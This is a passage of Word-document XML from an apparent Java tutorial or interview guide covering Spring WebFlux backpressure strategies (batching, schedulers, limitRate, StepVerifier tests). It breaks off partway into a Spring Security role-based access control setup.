    <w:p w14:paraId="6758B4AB"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5117EC3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1DCD1F78"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613D083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Processing data in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batches</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7247E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ful when you can afford to </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>process data in chunks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E56A5"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7D809">
          <v:rect id="_x0000_i2834" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="068EC20D"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Batching with Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB712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Batch data and apply backpressure strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D0DD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batch")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E19C9E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List&lt;Integer&gt;&gt; batchStream() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E645F7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4BB028C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5))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401A64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buffer(100)  // Collect in batches of 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8840F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3930F1A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25B3C77F"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7CF92A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uitable when </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>processing in bulk</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE348A1"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794B6">
          <v:rect id="_x0000_i2835" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="136632D1"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7. Using Reactive Schedulers for Parallel Processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B825C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Adjust the data processing speed using Schedulers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8F64A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GetMapping("/parallel")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0114DDB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public Flux&lt;Integer&gt; parallelStream() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188B86B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return Flux.range(1, 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBCA36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delayElements(Duration.ofMillis(1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED67CBA"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publishOn(Schedulers.boundedElastic())  // Parallel execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157BD1E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Buffer(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A31293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og();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B07250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3C257083"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035A370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ful when </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I/O-bound tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> need to be processed concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FE7897"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90A983">
          <v:rect id="_x0000_i2836" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B64F94B"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8. Best Practices for Backpressure Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC942D"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nalyze Data Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8D6BB3"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onBackpressureDrop()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for non-critical, real-time data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78697456"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onBackpressureBuffer()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for critical, transient data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0FDE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Apply Flow Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A6283"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window()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>buffer()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to chunk data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E20745"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Apply </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>limitRate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to slow down the producer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3DB28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Flux.range(1, 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF7351E"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limitRate(50);  // Process 50 items at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BDA9C6"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Monitor and Test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3126DDB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tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Micrometer</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Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to monitor reactive streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B152FBE"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Simulate high-load scenarios during testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D559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Design for Failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA362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onErrorResume() to gracefully handle exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5CDA54"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Ensure that dropped or lost data is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logged or retried</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54307FA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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Proper Schedulers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E6A9B"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boundedElastic() for I/O tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6CB1F2" w14:textId="77777777" w:rsidR="00B8030B" w:rsidRPr="00B8030B" w:rsidRDefault="00B8030B" w:rsidP="00B8030B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Use parallel() for CPU-bound processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F37180"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C3E48D">
          <v:rect id="_x0000_i2837" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155F425"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9. Testing Backpressure Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09841593"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StepVerifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test the backpressure scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C4BB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Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4330B4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void testBackpressure() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E83752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Flux&lt;Integer&gt; flux = Flux.range(1, 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54322332"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onBackpressureDrop();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227D20B0" w14:textId="77777777" w:rsidR="00B8030B" w:rsidRPr="00B8030B" w:rsidRDefault="00B8030B" w:rsidP="00B8030B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355BCC84"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StepVerifier.create(flux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC1AFD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            .expectNextCount(1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A843E7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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            .verifyComplete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D8099"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541B42D9" w14:textId="77777777" w:rsidR="00B8030B" w:rsidRPr="00B8030B" w:rsidRDefault="00000000" w:rsidP="00B8030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3D1FC">
          <v:rect id="_x0000_i2838" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E073CC" w14:textId="77777777" w:rsidR="00B8030B" w:rsidRPr="00B8030B" w:rsidRDefault="00B8030B" w:rsidP="00B8030B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10. Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C7215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Spring WebFlux provides various strategies to manage backpressure: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Buffer, Drop, Latest, and Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F56E457"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Choose the strategy based on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data criticality</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performance requirements</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7382C05C"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Combine strategies and use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>windowing and batching</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for large streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A72D8"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Monitor reactive applications to detect and mitigate backpressure issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B4B82F" w14:textId="77777777" w:rsidR="00B8030B" w:rsidRPr="00B8030B" w:rsidRDefault="00B8030B" w:rsidP="00B8030B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By effectively handling backpressure, your Spring WebFlux application will remain </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>responsive</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>scalable</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stable</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8030B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> under high-concurrency scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD7D6DA" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00000000" w:rsidP="00187C12">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="5DEC80B2">
          <v:rect id="_x0000_i2839" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="055A4643" w14:textId="332A65E5" w:rsidR="00187C12" w:rsidRPr="00CE4B95" w:rsidRDefault="00B87F88" w:rsidP="00187C12">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="693" w:name="_Toc197867907"/>
      <w:r w:rsidRPr="00B87F88">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">How do you manage </w:t>
      </w:r>
      <w:r w:rsidR="00B8030B" w:rsidRPr="00B87F88">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>role-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87F88">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> access control to your API using Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="693"/>
    </w:p>
    <w:p w14:paraId="6368E079" w14:textId="3964CA1A" w:rsidR="007A7421" w:rsidRPr="007A7421" w:rsidRDefault="007A7421" w:rsidP="00042D1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To manage </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>role-based access control (RBAC)</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in your API using </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you typically follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49786D7B"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1. Setup Spring Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0CD44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Spring Security allows you to configure authorization at both the method and endpoint levels. You will define the roles and permissions in your security configuration class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0337DA3F"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A2B3FF">
          <v:rect id="_x0000_i2840" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC5671"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2. Define Roles and Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CDF5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You need to define roles such as ROLE_ADMIN, ROLE_USER, etc., and associate them with specific endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342085CA"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044A8">
          <v:rect id="_x0000_i2841" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB95BEA"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3. Configure Spring Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08080F6E"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a. Basic Setup of Spring Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3844A64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first need to add </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7421">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to your pom.xml or build.gradle file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAB0DC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Maven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093BDF3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58EFE22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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C2E3F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artifactId&gt;spring-boot-starter-security&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AFEA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17D42D1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Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D183A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implementation 'org.springframework.boot:spring-boot-starter-security'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB5348E"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6C729">
          <v:rect id="_x0000_i2842" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADE19C"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b. Basic Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B4F61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reate a class that extends WebSecurityConfigurerAdapter and override the configure(HttpSecurity http) method to specify the roles and permissions for your API endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015190B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3129BDC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WebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2963754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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
